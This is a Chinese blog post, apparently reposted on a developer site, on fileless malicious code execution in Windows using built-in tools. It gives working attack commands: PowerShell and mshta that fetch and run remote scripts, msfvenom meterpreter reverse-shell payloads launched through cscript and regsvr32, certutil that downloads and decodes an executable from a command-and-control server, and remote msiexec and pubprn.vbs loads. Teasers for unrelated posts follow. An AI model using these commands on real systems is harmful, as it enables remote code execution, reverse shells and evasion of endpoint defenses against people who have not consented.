1. 全栈程序员必看首页

windows无exe

全栈程序员-站长 未分类 阅读 9

windows无exewindows无exe加载脚本方式恶意脚本加载powershellmshta.exeCScript.exe&WScript.exeWindows原生工具加载regsvr32.exedllsctcertutil.exewinrm.vbsmsiexec.exewmic.exepubprn.vbs参考加载脚本方式利用Windows自带的解析器:PowerShell、VBScript、批处理文件和JavaScript,对应的应用程序分别为powershell.exe、cscript.exe、cmd.ex

大家好,又见面了,我是你们的朋友全栈君。

windows无exe

加载脚本方式

利用Windows自带的解析器:PowerShell、VBScript、批处理文件和JavaScript,对应的应用程序分别为powershell.exe、cscript.exe、cmd.exe和mshta.exe。利用上传或远程加载对应payload脚本,直接调用解析器运行(可以使用Invoke-Obfuscation或者 Invoke-DOSfuscation 等进行混淆)
用Windows自带的工具或脚本等原生工具实现执行恶意代码、启动程序、执行脚本、窃取数据、横向扩展、维持访问等,常用的有regsvr32.exe、rundll32.exe、certutil.exe、schtasks.exe、wmic.exe等,脚本类型的有:winrm.vbs、wmiexec.vbs、pubprn.vbs等

恶意脚本加载

powershell

powershell "IEX (New-Object Net.WebClient).DownloadString('http://x.x.x.x/Script.ps1'); Script [argv]"

mshta.exe

msf

use exploit/windows/misc/hta_server
set lhost x.x.x.x
set lport 4444
run

windows执行

mshta http://192.168.164.128:8080/lWdH9aFeeIe.hta

在这里插入图片描述

CScript.exe&WScript.exe

上述两个工具都可以解析运行vbs和js的脚本。但值得注意的是WScript是将输出结果以对话框的形式显示,而CScript是以命令行的形式显示输出结果。使用也很简单:cscript %TEMP%\log.vbs 或者 wscript C:\test.js

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.164.128 lport=4444 -f vbs -o 123.vbs

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
run

cscript 123.vbs

Windows原生工具加载

regsvr32.exe

dll

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.164.128 lport=4444 -f dll -o 123.dll

regsvr32 /u /s 123.dll

sct

参考
https://github.com/GreatSCT/GreatSCT

certutil.exe

certuil.exe -urlcache -split -f [URL] outfile.file
certutil.exe -verifyctl -f -split http://www.baidu.com #无法绕过defender

编码

base64 payload.exe > /var/www/html/update.txt

解码执行

certutril -urlcache -split -f http://cc_server/update.txt & certurl -decode update.txt update.exe & update.exe

winrm.vbs

cscript C:\windows\system32\winrm.vbs invoke Create wmicimv2/Win32_Process -SkipCAcheck -SkipCNcheck -file:123.xml

123.xml

<?xml version="1.0" encoding="UTF-8"?>
<p:Create_INPUT xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wmi/root/cimv2/Win32_Process">
   <p:CommandLine>calc.exe</p:CommandLine>
   <p:CurrentDirectory>C:\</p:CurrentDirectory>
</p:Create_INPUT>

在这里插入图片描述
无文件

Winrm invoke Create wmicimv2/Win32_Process @{ 
   CommandLine="calc.exe";CurrentDirectory="C:\"}

在这里插入图片描述

msiexec.exe

C:\Windows\System32\msiexec.exe /q /i http://192.168.164.128:8080/123.msi

复现出错

wmic.exe

# 暂无

pubprn.vbs

C:\Windows\System32\Printing_Admin_Scripts
下语言目录下
可以用来解析sct

pubprn.vbs 127.0.0.1 script:http://x.x.x.x/payload1.sct

参考

https://github.com/GreatSCT/GreatSCT
Windows-noFile

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请联系我们举报,一经查实,本站将立刻删除。

发布者:全栈程序员-站长,转载请注明出处:https://javaforall.net/159696.html原文链接:https://javaforall.net

(0)
全栈程序员-站长的头像全栈程序员-站长
0 0


相关推荐

  • linux卸载已安装软件的命令_软件卸载不了

    linux卸载已安装软件的命令_软件卸载不了

    linux卸载已安装软件的命令_软件卸载不了1、删除软件方法一、如果你知道要删除软件的具体名称,可以使用12方法二、如果不知道要删除软件的具体名称,可以使用1sudoapt-getpurge一个带core的package,如果

    全栈程序员-站长的头像 全栈程序员-站长
    2022年8月2日
    5
  • 2015年2月编程语言排行榜:JavaScript排名达到历史最高

    2015年2月编程语言排行榜:JavaScript排名达到历史最高

    2015年2月编程语言排行榜:JavaScript排名达到历史最高

    全栈程序员-站长的头像 全栈程序员-站长
    2021年9月4日
    46
  • python进制转换函数及方法[通俗易懂]

    python进制转换函数及方法[通俗易懂]

    python进制转换函数及方法[通俗易懂]python进制转换函数一.通过int函数实现其他进制转十进制假设M为某已知进制字符串n的进制数result=int(n,M)——————————————————————————————->>>result=int(‘10101’,2)>>>result>>>21result为转换为的十进制结

    全栈程序员-站长的头像 全栈程序员-站长
    2022年5月19日
    36
  • Java POI 导出Excel经典实现 导出Excel弹出下载框 Spring Boot【不定期更新】

    Java POI 导出Excel经典实现 导出Excel弹出下载框 Spring Boot【不定期更新】

    Java POI 导出Excel经典实现 导出Excel弹出下载框 Spring Boot【不定期更新】在web开发中,有一个经典的功能,就是数据的导入导出。特别是数据的导出,在生产管理或者财务系统中用的非常普遍,因为这些系统经常要做一些报表打印的工作。而数据导出的格式一般是EXCEL或者PDF,我这里就用两篇文章分别给大家介绍下。(注意,我们这里说的数据导出可不是数据库中的数据导出!么误会啦^_^)呵呵,首先我们来导出EXCEL格式的文件吧。现在主流的操作Ex…

    全栈程序员-站长的头像 全栈程序员-站长
    2022年5月29日
    36
  • win7笔记本卡顿怎么解决_win10玩cf卡顿解决方法

    win7笔记本卡顿怎么解决_win10玩cf卡顿解决方法

    win7笔记本卡顿怎么解决_win10玩cf卡顿解决方法win7系统运行卡顿的解决方法?我们在操作win7系统电脑的时候,常常会遇到win7系统运行卡顿的问题。那么出现win7系统运行卡顿的问题该怎么解决呢?很多对电脑不太熟悉的小伙伴不知道win7系统运行卡顿到底该如何解决?其实只需要首先检查一下自己的电脑有没有装了多余的软件,假如是没有用的程序和那些你通过在网上下载其他程序的软件捆绑的程序,要把它卸载掉,建议不要装杀毒软件,比如360安全卫士,金山毒…

    全栈程序员-站长的头像 全栈程序员-站长
    2022年9月12日
    0
  • pycharm怎么设置代码补全_vs2010代码自动补全

    pycharm怎么设置代码补全_vs2010代码自动补全

    pycharm怎么设置代码补全_vs2010代码自动补全代码补全功能在PyCharm上是一流的。默认情况下PyCharm会在你输入的时候给出建议:由于此功能可有点耗电,你可以通过选择File→PowerSaveMode来禁用它。您仍然可以通过Control-Space显式使用这一功能。…

    全栈程序员-站长的头像 全栈程序员-站长
    2022年8月28日
    2

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

关注全栈程序员社区公众号